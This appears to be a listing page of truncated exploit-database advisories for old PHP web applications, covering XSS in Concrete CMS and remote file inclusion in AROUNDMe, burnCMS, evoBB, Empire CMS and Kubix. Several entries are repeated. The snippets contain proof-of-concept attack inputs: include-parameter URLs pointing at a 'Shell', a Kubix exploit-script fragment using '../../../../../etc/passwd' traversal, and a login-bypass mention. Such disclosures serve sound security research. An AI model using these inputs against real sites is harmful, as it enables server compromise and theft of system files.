Concrete CMS: Cross-Site Scripting in getMarketplacePurchaseFrame

The $mp-getProductBlockID variable in the getMarketplacePurchaseFrame function view on Github is not being filtered properly to protect against HTML injection/XSS. This leads to XSS vulnerabilities in for example connect.php on line 14 view on Github when visiting a URL like:...

AROUNDMe 1.1 - language_path Remote File Inclusion

AROUNDMe 1.1 - languagepath Remote File Inclusion Discovered by cr4wl3r \ Indonesian Hacker 3rr0r: ./aroundme11/aroundme/components/core/connect.php line 25 PoC : http://server/path/components/core/connect.php?languagepath=Shell Contact Me : cr4wl3r4tlinuxmaildotorg Gorontalo / 2009...

AROUNDMe <= 1.1 (language_path) Remote File Include Exploit

No description provided by source. Discovered by cr4wl3r \ Indonesian Hacker 3rr0r: ./aroundme11/aroundme/components/core/connect.php line 25 ?php includeonce$languagepath . 'connect.lang.php'; ? PoC : http://server/path/components/core/connect.php?languagepath=Shell Contact Me :...

burncms-rfi.txt

burnCMS = 0.2rootRemote File Include Vulnerablities D.Script: http://www.burnstone.ch/downloads/burnCMS-0.2.zip Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc Exploit:PathburnCMS/lib/authuser.php?root=Shell Exploit:PathburnCMS/lib/misc.php?root=Shell...

burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications =========================================================== burnCMS = 0.2 root Remote File Inclusion Vulnerabilities =========================================================== burnCMS = 0.2rootRemote File Include Vulnerablities D.Script:...

Kubix &lt;= 0.7 Multiple Remote Vulnerabilities Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "\r\n"; echo "Kubix =0.7 Multiple Vulnerabilities Exploit\r\n"; echo "Site: http://www.kubixproject.net\r\n"; echo "Dork: Powered by: Kubix\r\n"; echo "by BlackHawk [email protected]\r\n"; echo "Thanks to rgod for th...

kubix 0.7 - Multiple Vulnerabilities

!/usr/bin/php -q -d shortopentag=on \r\n"; echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n"; if $argc Related: path of the file to include\r\n"; echo " |- Es: php ".$argv0." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n"; echo " 2 - Login Bypass PoC\r\n"; echo " |-...

Kubix <= 0.7 Multiple Remote Vulnerabilities Exploit

Exploit for unknown platform in category web applications ==================================================== Kubix Related: path of the file to include\r\n"; echo " |- Es: php ".$argv0." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n"; echo " 2 - Login Bypass PoC\r\n"; echo " |- Related:...

kubix 0.7 - Multiple Vulnerabilities

kubix 0.7 - Multiple Vulnerabilities !/usr/bin/php -q -d shortopentag=on \r\n"; echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n"; if $argc Related: path of the file to include\r\n"; echo " |- Es: php ".$argv0." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n"; echo " 2 ...

evoBB &lt;= v0.3 &#40;path&#41; Remote File Inclusion Exploit

============================================================================================== evoBB = v0.3 path Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

evoBB 0.3 - &#039;path&#039; Remote File Inclusion

============================================================================================== evoBB = v0.3 path Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

evoBB 0.3 - path Remote File Inclusion

evoBB 0.3 - path Remote File Inclusion ============================================================================================== evoBB = v0.3 path Remote File Inclusion Exploit =============================================================================================== Critical Level :...

Empire CMS 3.7 - &#039;checklevel.php&#039; Remote File Inclusion

Empire CMS =3.7 checklevel.php Remote File Include Vulnerability Find by: Bob Linuson Code: 2 $includefile=$checkpath."e/class/MemberLevel.php"; 3 include"$includefile"; ..... 67 include$checkpath."e/class/connect.php"; 68 include$checkpath."e/class/dbsql.php"; 69...

Empire CMS 3.7 - checklevel.php Remote File Inclusion

Empire CMS 3.7 - checklevel.php Remote File Inclusion Empire CMS =3.7 checklevel.php Remote File Include Vulnerability Find by: Bob Linuson Code: 2 $includefile=$checkpath."e/class/MemberLevel.php"; 3 include"$includefile"; ..... 67 include$checkpath."e/class/connect.php"; 68...

Empire CMS &lt;= 3.7 (checklevel.php) Remote File Include Vulnerability

No description provided by source. Empire CMS =3.7 checklevel.php Remote File Include Vulnerability Find by: Bob Linuson Code: 2 $includefile=$checkpath."e/class/MemberLevel.php"; 3 include"$includefile"; ..... 67 include$checkpath."e/class/connect.php"; 68 include$checkpath."e/class/dbsql.php"; ...